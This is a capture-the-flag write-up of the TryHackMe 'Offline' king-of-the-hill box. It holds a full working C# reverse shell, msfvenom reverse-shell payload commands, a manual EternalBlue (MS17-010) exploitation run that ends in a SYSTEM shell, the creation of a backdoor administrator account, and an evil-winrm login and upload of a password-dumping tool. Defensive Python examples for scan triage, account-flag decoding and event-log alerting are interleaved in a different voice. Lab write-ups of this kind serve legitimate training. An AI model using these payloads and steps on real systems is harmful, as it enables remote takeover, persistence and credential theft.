thm-offline-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play a KOTH CTF called Offline at https://tryhackme.com/

First, an nmap scan:

root@kali:/opt/MS17-010-2012# nmap -A 10.10.148.6 
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-18 03:19 EDT
Stats: 0:01:03 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Nmap scan report for 10.10.148.6
Host is up (0.028s latency).
Not shown: 976 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst: 
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
| 3072 55:15:8d:d0:54:38:1b:d6:a9:9e:3f:b0:0b:b3:14:34 (RSA)
| 256 cf:5b:e2:de:ce:3b:04:e6:8c:24:6c:2f:37:25:05:c5 (ECDSA)
|_ 256 82:bf:bb:09:69:a7:25:5d:66:58:ea:c6:53:d8:c8:8e (ED25519)
53/tcp open domain?
| fingerprint-strings: 
| DNSVersionBindReqTCP: 
| version
|_ bind
80/tcp open http Microsoft IIS httpd 8.5
| http-methods: 
|_ Potentially risky methods: TRACE COPY PROPFIND LOCK UNLOCK PROPPATCH MKCOL PUT DELETE MOVE
|_http-server-header: Microsoft-IIS/8.5
|_http-svn-info: ERROR: Script execution failed (use -d to debug)
|_http-title: Offline TV
| http-webdav-scan: 
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, LOCK, UNLOCK
| Server Date: Mon, 18 May 2020 07:22:26 GMT
| Server Type: Microsoft-IIS/8.5
| WebDAV type: Unkown
| Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
| Directory Listing: 
| http://10.10.148.6/
| http://10.10.148.6/iis-85.png
| http://10.10.148.6/iisstart.htm
| http://10.10.148.6/otv.jpg
| http://10.10.148.6/Scarras_Super_Secret_Password.txt
| Exposed Internal IPs: 
|_ 10.10.148.6
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-18 07:20:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: kingofthe.domain, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds
| fingerprint-strings: 
| SMBProgNeg: 
|_ SMBr
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: kingofthe.domain, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Service
| ssl-cert: Subject: commonName=Offline.kingofthe.domain
| Not valid before: 2020-04-07T00:07:50
|_Not valid after: 2020-10-07T00:07:50
|_ssl-date: 2020-05-18T07:22:27+00:00; 0s from scanner time.
9999/tcp open http Microsoft IIS httpd 8.5
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/plain).
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49175/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=5/18%Time=5EC23727%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=5/18%OT=21%CT=1%CU=30177%PV=Y%DS=2%DC=T%G=Y%TM=5EC2382
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=108%TI=I%CI=I%II=I%SS=S%TS=7
OS:)OPS(O1=M508NW8ST11%O2=M508NW8ST11%O3=M508NW8NNT11%O4=M508NW8ST11%O5=M50
OS:8NW8ST11%O6=M508ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000
OS:)ECN(R=Y%DF=Y%T=64%W=2000%O=M508NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=64%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=64%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T
OS:=64%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=64%W=0%S=A%A=O%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=64%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=64%W=0%S
OS:=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=64%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=64%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=64%CD=Z)

Network Distance: 2 hops
Service Info: Host: OFFLINE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h45m00s, deviation: 3h30m00s, median: 0s
|_nbstat: NetBIOS name: OFFLINE, NetBIOS user: <unknown>, NetBIOS MAC: 02:93:15:c9:fb:80 (unknown)
| smb-os-discovery: 
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: Offline
| NetBIOS computer name: 
| Domain name: kingofthe.domain
| Forest name: kingofthe.domain
| FQDN: Offline.kingofthe.domain
|_ System time: 2020-05-18T00:22:28-07:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2020-05-18 03:22:28
|_ start_date: 2020-05-18 02:55:02

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 27.46 ms 10.11.0.1
2 27.57 ms 10.10.148.6

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 276.54 seconds
root@kali:/opt/MS17-010-2012#
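Reading a report this long by eye is error-prone, so here is an added example (not part of this write-up and not nmap's own tooling) that pulls the findings a defender would want to fix first out of an `nmap -A` text report: the write-capable WebDAV methods the server advertises, the files the PROPFIND listing exposed, cleartext FTP, exposed RDP, and whether SMB signing is required. `SAMPLE_REPORT` is a constructed excerpt of the scan above; the rule set (`WRITE_METHODS` and the port checks) is this example's own.

```python
"""Triage an `nmap -A` text report for the exposures a defender fixes first.
Added example: SAMPLE_REPORT is a constructed excerpt of the scan on this page;
the rules below (WRITE_METHODS, the port checks) are this example's own."""
import re

SAMPLE_REPORT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND LOCK UNLOCK PROPPATCH MKCOL PUT DELETE MOVE
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
| Directory Listing:
| http://10.10.148.6/
| http://10.10.148.6/Scarras_Super_Secret_Password.txt
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Service
Host script results:
| smb-security-mode:
|_ message_signing: required
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
# WebDAV verbs that let a client change server content; none of them
# should be reachable without authentication on a public web root.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}


def parse_ports(report):
    """Return {port: (proto, service, version)} for each open port line."""
    ports = {}
    for line in report.splitlines():
        m = PORT_RE.match(line.strip())
        if m and m.group(3) == "open":
            ports[int(m.group(1))] = (m.group(2), m.group(4), m.group(5).strip())
    return ports


def webdav_write_methods(report):
    """Write-capable methods advertised in the OPTIONS response (sorted)."""
    for line in report.splitlines():
        if "Public Options:" in line:
            advertised = {m.strip() for m in line.split("Public Options:")[1].split(",")}
            return sorted(WRITE_METHODS & advertised)
    return []


def listed_files(report):
    """URLs from the PROPFIND directory listing that name files, not directories."""
    files = []
    for line in report.splitlines():
        entry = line.lstrip("|_ ").strip()
        if entry.startswith(("http://", "https://")) and not entry.endswith("/"):
            files.append(entry)
    return files


def findings(report):
    """Ordered list of short finding tags for the report."""
    ports = parse_ports(report)
    out = []
    methods = webdav_write_methods(report)
    if methods:
        out.append("webdav-write-methods: " + ",".join(methods))
    out.extend("exposed-file: " + url for url in listed_files(report))
    if 21 in ports:
        out.append("cleartext-ftp")
    if 3389 in ports:
        out.append("rdp-exposed")
    if 445 in ports and "message_signing: required" not in report:
        out.append("smb-signing-not-required")
    return out


if __name__ == "__main__":
    for tag in findings(SAMPLE_REPORT):
        print(tag)
```

On this scan the SMB signing check stays quiet because signing is required, while the WebDAV and exposed-file tags are the ones that matter: an IIS WebDAV root that accepts PUT, MOVE and DELETE from anonymous clients is a content-tampering problem regardless of what the rest of the box looks like.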

Files used:

MS17-010-2012.zip

MS17-010-2012.py

Modify them to fit your needs:

root@kali:/opt/MS17-010-2012# cat ms17-010-puckiestyle.py | grep .exe
smb_send_file(smbConn, '/root/htb/blue/puckieshell443.exe', 'C', '/puckieshell443.exe')
service_exec(conn, r'cmd /c c:\\puckieshell443.exe') 
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
# executing binary generated by "msfvenom -f exe-service ..."
# Note: using Windows Service to execute command same as how psexec works
def service_exec(conn, cmd):

 

Writing simple C# reverse shell code

Looking on GitHub, there are many examples of C# code that open reverse shells via cmd.exe. In this case I copied part of that code and used the following simple C# program. No evasion, no persistence, no hiding of code, only a simple “open a socket and launch cmd.exe on the victim machine”:

using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;


namespace ConnectBack
{
	public class Program
	{
		// Shared writer so the output handler can send cmd.exe output back over the socket.
		static StreamWriter streamWriter;

		public static void Main(string[] args)
		{
			// Connect back to the listener (adjust the IP and port to your setup).
			using(TcpClient client = new TcpClient("10.0.2.15", 443))
			{
				using(Stream stream = client.GetStream())
				{
					using(StreamReader rdr = new StreamReader(stream))
					{
						streamWriter = new StreamWriter(stream);

						StringBuilder strInput = new StringBuilder();

						// Start cmd.exe with its standard streams redirected.
						Process p = new Process();
						p.StartInfo.FileName = "cmd.exe";
						p.StartInfo.CreateNoWindow = true;
						p.StartInfo.UseShellExecute = false;
						p.StartInfo.RedirectStandardOutput = true;
						p.StartInfo.RedirectStandardInput = true;
						p.StartInfo.RedirectStandardError = true;
						p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
						p.Start();
						p.BeginOutputReadLine();

						// Forward each line read from the socket to cmd.exe's stdin.
						while(true)
						{
							strInput.Append(rdr.ReadLine());
							//strInput.Append("\n");
							p.StandardInput.WriteLine(strInput);
							strInput.Remove(0, strInput.Length);
						}
					}
				}
			}
		}

		// Called for every line cmd.exe writes to stdout; relays it to the socket.
		private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
		{
			StringBuilder strOutput = new StringBuilder();

			if (!String.IsNullOrEmpty(outLine.Data))
			{
				try
				{
					strOutput.Append(outLine.Data);
					streamWriter.WriteLine(strOutput);
					streamWriter.Flush();
				}
				// Ignore write errors; the unused 'err' variable in the original caused warning CS0168.
				catch (Exception) { }
			}
		}

	}
}
Simple Reverse shell C# code

root@kali:~# nc -lvp 443
listening on [any] 443 ...
Kali Linux in listening mode

I put my Kali box in listening mode on port 443 with netcat, then compiled and executed my code.

Scan the exe file with no Threats found

As you can see, the .exe file is clean for Windows Defender. From the AV side, no malicious actions were performed yet. This could be a standard result.

file execution on victim machine

When the file is executed, the cmd instance is visible to the user, and if the prompt window is closed the shell goes with it.

root@kali:~# nc -lvp 443
listening on [any] 443 ...
192.168.178.14: inverse host lookup failed: Unknown host
connect to [192.168.178.16] from (UNKNOWN) [192.168.178.14] 25852
Microsoft Windows [Version 10.0.17134.523]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\PENTEST>
C:\PENTEST>whoami
lt-jacco\jacco
Running reconnaissance commands on victim machine from Kali Linux

Running the exe file immediately spawns the shell on my Kali box.

Finding the C# compiler (csc.exe)

dir /s %WINDIR%\CSC.EXE

Compiling

c:\PENTEST>c:\windows\Microsoft.NET\Framework\v3.5\csc.exe /t:exe /out:Simple_Rev_Shell443.exe Simple_Rev_Shell443.cs
Microsoft (R) Visual C# 2008 Compiler version 3.5.30729.8931
for Microsoft (R) .NET Framework version 3.5
Copyright (C) Microsoft Corporation. All rights reserved.

Simple_Rev_Shell443.cs(64,34): warning CS0168: The variable 'err' is declared but never used

c:\PENTEST>dir Simple_Rev_Shell443.*
Volume in drive C is Boot
Volume Serial Number is 9488-7836

Directory of c:\PENTEST

09/02/2019 19:45 1.822 Simple_Rev_Shell443.cs
10/02/2019 10:27 5.120 Simple_Rev_Shell443.exe
2 File(s) 6.942 bytes
0 Dir(s) 6.854.045.696 bytes free

Reference used: https://github.com/itaykrk/CSharp-reverse-tcp

Not needed for this, but when compiling saftykatz32.exe, why do I get the following error: “Unsafe code may only appear if compiling with /unsafe”? I work in C# with Visual Studio 2015 on Windows.

To use unsafe code blocks, the project has to be compiled with the /unsafe switch on.

Open the properties for the project, go to the Build tab and check the “Allow unsafe code” checkbox.

Let’s exploit MS17-010 the manual way.

root@kali:/opt/MS17-010-2012# python checker.py 10.10.148.6
Target OS: Windows Server 2012 R2 Standard 9600
The target is not patched

=== Testing named pipes ===
spoolss: Ok (64 bit)
samr: Ok (64 bit)
netlogon: Ok (64 bit)
lsarpc: Ok (64 bit)
browser: STATUS_OBJECT_NAME_NOT_FOUND

There may be times when you want to exploit MS17-010 (EternalBlue) without having to rely on using Metasploit. Perhaps you want to run it from a ‘Command & Control’ system without msf installed, run a quick demo or execute on the go. Unlike “zzz_exploit”, this method does not require access to a named pipe, nor does it require any credentials. The downside, however, is an increased risk of crashing the target. Kudos to Worawit Wang for making this easy.


Start by cloning the following repository:

$ git clone https://github.com/worawit/MS17-010.git

The shellcode directory holds (you guessed it) the kernel shellcodes.

$ ls -l MS17-010/shellcode/
total 44
-rw-r--r-- 1 root root 20305 Dec  2 22:03 eternalblue_kshellcode_x64.asm
-rw-r--r-- 1 root root 19862 Dec  2 22:03 eternalblue_kshellcode_x86.asm
-rw-r--r-- 1 root root  1589 Dec  2 22:03 eternalblue_sc_merge.py

The first step is to assemble the shellcode to binary. You can do either one (depending on which architecture your target is running), or assemble both and merge them into a single binary file. The latter is useful when you don’t know the target arch or if you are planning to run it against multiple systems with different architectures.


x64 shellcode

Assemble kernel shellcode with nasm:

$ nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin

Generate a binary payload or use an existing one. Name this sc_x64_payload.bin:

$ msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=10.11.3.122 --platform windows -a x64 --format raw -o sc_x64_payload.bin
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Saved as: sc_x64_payload.bin

Concatenate payload & shellcode:

$ cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin

x86 shellcode

Assemble kernel shellcode with nasm:

$ nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin

Generate a binary payload or use an existing one. Name this sc_x86_payload.bin:

$ msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=10.11.3.122 --platform windows -a x86 --format raw -o sc_x86_payload.bin
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Saved as: sc_x86_payload.bin

Concatenate payload & shellcode:

$ cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin

Merging binaries

This step is only necessary when you want both x64 and x86 in the same binary. Assuming that you followed the steps above for each architecture, merging is done with the included eternalblue_sc_merge.py script:

$ python MS17-010/shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin

Targets

The eternalblue scripts are located in MS17-010/ and have the following targets.

eternalblue_exploit7.py:

  • Windows Server 2008 & R2
  • Windows Server 2012 & R2 (x86)
  • Windows Server 2016 (x64)
  • Windows Vista
  • Windows 7

eternalblue_exploit8.py:

  • Windows Server 2012 (x64)
  • Windows 8.1 & RT
  • Windows 10 (x64) (build < 14393)

Running exploit

Word of advice; running these blindly against the target is a bad idea. Be sure to enumerate the OS first. Also, expect your target to crash or force a reboot once the session is closed.

Example run against a vulnerable Windows 7 host:

It is now possible to run zzz_exploit.py. A named pipe is required to execute the script, and in this case ntsvcs works just fine.

root@kali:/opt/MS17-010-2012# python eternalblue_exploit8.py 10.10.241.183 /opt/MS17-010-2012//shellcode/sc_x64.bin
shellcode size: 1232
numGroomConn: 13
Target OS: Windows Server 2012 R2 Standard 9600
got good NT Trans response
got good NT Trans response
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status for nx: INVALID_PARAMETER
good response status: INVALID_PARAMETER
done
root@kali:/opt/MS17-010-2012# nc -nlvp 443
listening on [any] 443 ...
connect to [10.11.3.122] from (UNKNOWN) [10.10.148.6] 49236
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\>hostname
hostname
Offline

C:\>dir flag.txt /s
dir flag.txt /s
 Volume in drive C has no label.
 Volume Serial Number is E403-33DE

 Directory of C:\Users\Administrator

04/08/2020  03:44 PM                37 flag.txt
               1 File(s)             37 bytes

 Directory of C:\Users\fed

04/08/2020  03:44 PM                37 flag.txt
               1 File(s)             37 bytes

 Directory of C:\Users\lily

04/08/2020  03:44 PM                37 flag.txt
               1 File(s)             37 bytes

 Directory of C:\Users\mykull

04/08/2020  03:43 PM                37 flag.txt
               1 File(s)             37 bytes

 Directory of C:\Users\poki

04/08/2020  03:43 PM                37 flag.txt
               1 File(s)             37 bytes

 Directory of C:\Users\scarra

04/08/2020  03:43 PM                37 flag.txt
               1 File(s)             37 bytes

 Directory of C:\Users\toast

04/08/2020  03:43 PM                37 flag.txt
               1 File(s)             37 bytes

 Directory of C:\Users\yvonne

04/08/2020  03:43 PM                37 flag.txt
               1 File(s)             37 bytes

     Total Files Listed:
               8 File(s)            296 bytes
               0 Dir(s)  48,990,380,032 bytes free

C:\>
C:\Users\Administrator\king-server>dir
dir
Volume in drive C has no label.
Volume Serial Number is E403-33DE

Directory of C:\Users\Administrator\king-server

04/07/2020 08:12 PM <DIR> .
04/07/2020 08:12 PM <DIR> ..
04/14/2020 01:13 AM 0 king.txt
04/07/2020 08:16 PM 624 web.config
2 File(s) 624 bytes
2 Dir(s) 49,020,686,336 bytes free

C:\Users\Administrator\king-server>echo "puckiestyle" >> king.txt
echo "puckiestyle" >> king.txt

C:\Users\Administrator\king-server>type king.txt
type king.txt
"puckiestyle"
C:\Shares\King>dir
dir
Volume in drive C has no label.
Volume Serial Number is E403-33DE

Directory of C:\Shares\King

04/14/2020 02:16 PM <DIR> .
04/14/2020 02:16 PM <DIR> ..
04/13/2020 03:56 PM 25 exec.bat
05/18/2020 12:05 AM 83 king.txt
04/14/2020 03:32 PM 195 script.bat
3 File(s) 303 bytes
2 Dir(s) 48,962,973,696 bytes free

C:\Shares\King>type king.txt
type king.txt
"puckiestyle" 
has king! mykull queried king.txt at Mon 05/18/2020 0:05:01.04

C:\Shares\King>

Other stuff

Finding users with https://github.com/trustedsec/ridenum

root@kali:/opt/ridenum# ./ridenum.py 10.10.227.210 500 50000 lily lolily
[*] Attempting lsaquery first...This will enumerate the base domain SID
[*] Successfully enumerated base domain SID. Printing information: 
Domain Name: KingOfTheDomain
Domain Sid: S-1-5-21-2684872673-4160438805-3138582355
[*] Moving on to extract via RID cycling attack.. 
[*] Enumerating user accounts.. This could take a little while.
Account name: KingOfTheDomain\Administrator
Account name: KingOfTheDomain\Guest
Account name: KingOfTheDomain\krbtgt
Account name: KingOfTheDomain\OFFLINE$
Account name: KingOfTheDomain\mykull
Account name: KingOfTheDomain\poki
Account name: KingOfTheDomain\lily
Account name: KingOfTheDomain\toast
Account name: KingOfTheDomain\scarra
Account name: KingOfTheDomain\yvonne
Account name: KingOfTheDomain\fed
Account name: KingOfTheDomain\SVC_ROBOTARMY
[*] RIDENUM has finished enumerating user accounts...


root@kali:~/thm/offline# rpcclient -U "lily" 10.10.227.210
Enter WORKGROUP\lily's password: 
rpcclient $> lsaquery
Domain Name: KingOfTheDomain
Domain Sid: S-1-5-21-2684872673-4160438805-3138582355
rpcclient $> queryuser mykull
User Name : mykull
Full Name : Mykull Reeves
Home Drive : 
Dir Drive : 
Profile Path: 
Logon Script: 
Description : NightmareNightmareNightmareNightmare
Workstations: 
Comment : 
Remote Dial :
Logon Time : Thu, 28 May 2020 04:35:17 EDT
Logoff Time : Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time : Wed, 13 Sep 30828 21:48:05 EST
Password last set Time : Sun, 05 Apr 2020 20:03:40 EDT
Password can change Time : Mon, 06 Apr 2020 20:03:40 EDT
Password must change Time: Wed, 13 Sep 30828 21:48:05 EST
unknown_2[0..31]...
user_rid : 0x452
group_rid: 0x201
acb_info : 0x00000210
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x000000c4
padding1[0..7]...
logon_hrs[0..21]...
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[mykull] rid:[0x452]
user:[poki] rid:[0x453]
user:[lily] rid:[0x454]
user:[toast] rid:[0x455]
user:[scarra] rid:[0x456]
user:[yvonne] rid:[0x457]
user:[fed] rid:[0x458]
user:[SVC_ROBOTARMY] rid:[0x459]
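The `queryuser` record above packs the account's control settings into a single `acb_info` value (0x00000210 for mykull). As an added example, not part of the original post and not rpcclient's own code, here is a Python decoder for that field using the ACB_* bit names Samba uses for the MS-SAMR account-control codes, with an audit step that lists what a defender should follow up on. `SAMPLE_QUERYUSER` is a constructed copy of the record shown above; the `RISKY` table is this example's own judgement.

```python
"""Decode rpcclient `queryuser` output and flag account settings worth a
follow-up. Added example: SAMPLE_QUERYUSER is a constructed copy of the record
shown on this page; ACB_FLAGS are the SAMR account-control bits as named by
Samba (MS-SAMR USER_ACCOUNT_* codes)."""

SAMPLE_QUERYUSER = """\
User Name : mykull
Full Name : Mykull Reeves
Description : NightmareNightmareNightmareNightmare
Logon Time : Thu, 28 May 2020 04:35:17 EDT
Password last set Time : Sun, 05 Apr 2020 20:03:40 EDT
user_rid : 0x452
group_rid: 0x201
acb_info : 0x00000210
bad_password_count: 0x00000000
logon_count: 0x000000c4
"""

ACB_FLAGS = {
    0x00001: "ACB_DISABLED",
    0x00002: "ACB_HOMDIRREQ",
    0x00004: "ACB_PWNOTREQ",
    0x00008: "ACB_TEMPDUP",
    0x00010: "ACB_NORMAL",
    0x00020: "ACB_MNS",
    0x00040: "ACB_DOMTRUST",
    0x00080: "ACB_WSTRUST",
    0x00100: "ACB_SVRTRUST",
    0x00200: "ACB_PWNOEXP",
    0x00400: "ACB_AUTOLOCK",
    0x00800: "ACB_ENC_TXT_PWD_ALLOWED",
    0x01000: "ACB_SMARTCARD_REQUIRED",
    0x02000: "ACB_TRUSTED_FOR_DELEGATION",
    0x04000: "ACB_NOT_DELEGATED",
    0x08000: "ACB_USE_DES_KEY_ONLY",
    0x10000: "ACB_DONT_REQUIRE_PREAUTH",
    0x20000: "ACB_PW_EXPIRED",
}

# Settings a defender should question on a human account, with the reason.
RISKY = {
    "ACB_PWNOEXP": "password never expires",
    "ACB_PWNOTREQ": "password not required",
    "ACB_DONT_REQUIRE_PREAUTH": "Kerberos pre-authentication disabled",
    "ACB_USE_DES_KEY_ONLY": "DES-only Kerberos keys",
    "ACB_TRUSTED_FOR_DELEGATION": "unconstrained delegation",
}


def parse_queryuser(text):
    """Turn the 'key : value' lines of a queryuser record into a dict."""
    record = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            record[key.strip()] = value.strip()
    return record


def decode_acb(value):
    """Names of the ACB_* bits set in a value such as '0x00000210'."""
    bits = int(value, 16)
    names = [name for bit, name in sorted(ACB_FLAGS.items()) if bits & bit]
    leftover = bits & ~sum(ACB_FLAGS)
    if leftover:
        names.append("UNKNOWN_0x%x" % leftover)
    return names


def audit_account(text):
    """Summarise one queryuser record: RID, decoded flags and follow-up items."""
    record = parse_queryuser(text)
    flags = decode_acb(record["acb_info"])
    issues = [RISKY[f] for f in flags if f in RISKY]
    if record.get("Description"):
        # The description attribute is readable by every authenticated domain
        # user, so anything secret put there is effectively public in the domain.
        issues.append("non-empty description (readable by all domain users)")
    return {
        "user": record["User Name"],
        "rid": int(record["user_rid"], 16),
        "flags": flags,
        "issues": issues,
    }


if __name__ == "__main__":
    print(audit_account(SAMPLE_QUERYUSER))
```

For mykull this decodes to ACB_NORMAL plus ACB_PWNOEXP (password never expires), and the description field is flagged because any domain user, lily included, can read it with exactly the query shown above.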




 

 

C:\Users\Administrator\king-server>net user /add puckie Style!
net user /add puckie Style!
The command completed successfully.

C:\Users\Administrator\king-server>net localgroup administrators puckie /add
net localgroup administrators puckie /add
The command completed successfully.
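From the blue-team side, the two commands above leave a very recognisable trace in the Security log: event 4720 (a user account was created) followed seconds later by 4732 (a member was added to a security-enabled local group) naming the Administrators group, whose well-known SID is S-1-5-32-544. The following added Python (not part of this write-up) correlates those two events over constructed sample records; the field names are a simplified subset of the real event data and the timestamps and subject names are made up.

```python
"""Correlate Security-log events 4720 and 4732 into "new account promoted to
local Administrators" alerts. Added example with constructed sample events;
the field names are a simplified subset of the real event data."""
from datetime import datetime, timedelta

EVENT_USER_CREATED = 4720            # A user account was created
EVENT_LOCAL_GROUP_ADD = 4732         # A member was added to a security-enabled local group
ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of BUILTIN\Administrators

SAMPLE_EVENTS = [  # constructed records, not taken from the box on this page
    {"time": "2020-05-18T07:40:01", "EventID": 4720, "SubjectUserName": "OFFLINE$",
     "TargetUserName": "puckie"},
    {"time": "2020-05-18T07:40:04", "EventID": 4732, "SubjectUserName": "OFFLINE$",
     "MemberName": "puckie", "TargetSid": "S-1-5-32-544"},
    {"time": "2020-05-18T09:12:30", "EventID": 4732, "SubjectUserName": "Administrator",
     "MemberName": "svc_backup", "TargetSid": "S-1-5-32-551"},
    {"time": "2020-05-18T10:00:00", "EventID": 4720, "SubjectUserName": "Administrator",
     "TargetUserName": "intern"},
    {"time": "2020-05-18T11:30:00", "EventID": 4732, "SubjectUserName": "Administrator",
     "MemberName": "helpdesk", "TargetSid": "S-1-5-32-544"},
]


def correlate(events, window=timedelta(minutes=10)):
    """Return one alert per addition to the local Administrators group.

    Severity is "high" when the member was created (4720) less than `window`
    earlier, the pattern an attacker with a SYSTEM shell leaves behind, and
    "medium" for any other addition, which still deserves a ticket."""
    created = {}   # lower-cased account name -> creation time
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        if ev["EventID"] == EVENT_USER_CREATED:
            created[ev["TargetUserName"].lower()] = when
        elif ev["EventID"] == EVENT_LOCAL_GROUP_ADD and ev["TargetSid"] == ADMINISTRATORS_SID:
            member = ev["MemberName"].lower()
            age = when - created[member] if member in created else None
            fresh = age is not None and age <= window
            alerts.append({
                "account": member,
                "by": ev["SubjectUserName"],
                "severity": "high" if fresh else "medium",
                "seconds_after_creation": int(age.total_seconds()) if fresh else None,
            })
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Matching on the group SID rather than the display name keeps the rule working on localised systems. The domain-level equivalent is event 4728 (member added to a security-enabled global group), which is what an addition to Domain Admins produces.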

root@kali:/opt# git clone https://github.com/Hackplayers/evil-winrm.git
root@kali:/opt/evil-winrm# gem install winrm-fs
Fetching: rubyzip-2.3.0.gem (100%)
Successfully installed rubyzip-2.3.0
Fetching: winrm-fs-1.3.4.gem (100%)
Successfully installed winrm-fs-1.3.4
Parsing documentation for rubyzip-2.3.0
Installing ri documentation for rubyzip-2.3.0
Parsing documentation for winrm-fs-1.3.4
Installing ri documentation for winrm-fs-1.3.4
Done installing documentation for rubyzip, winrm-fs after 2 seconds
2 gems installed
root@kali:/opt/evil-winrm# ./evil-winrm.rb -i 10.10.148.6 -u puckie -p 'Style!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\puckie\Documents> whoami
kingofthedomain\puckie

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i 10.10.148.6 -u puckie -p 'Style!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\puckie\Documents> upload pwdump8.exe
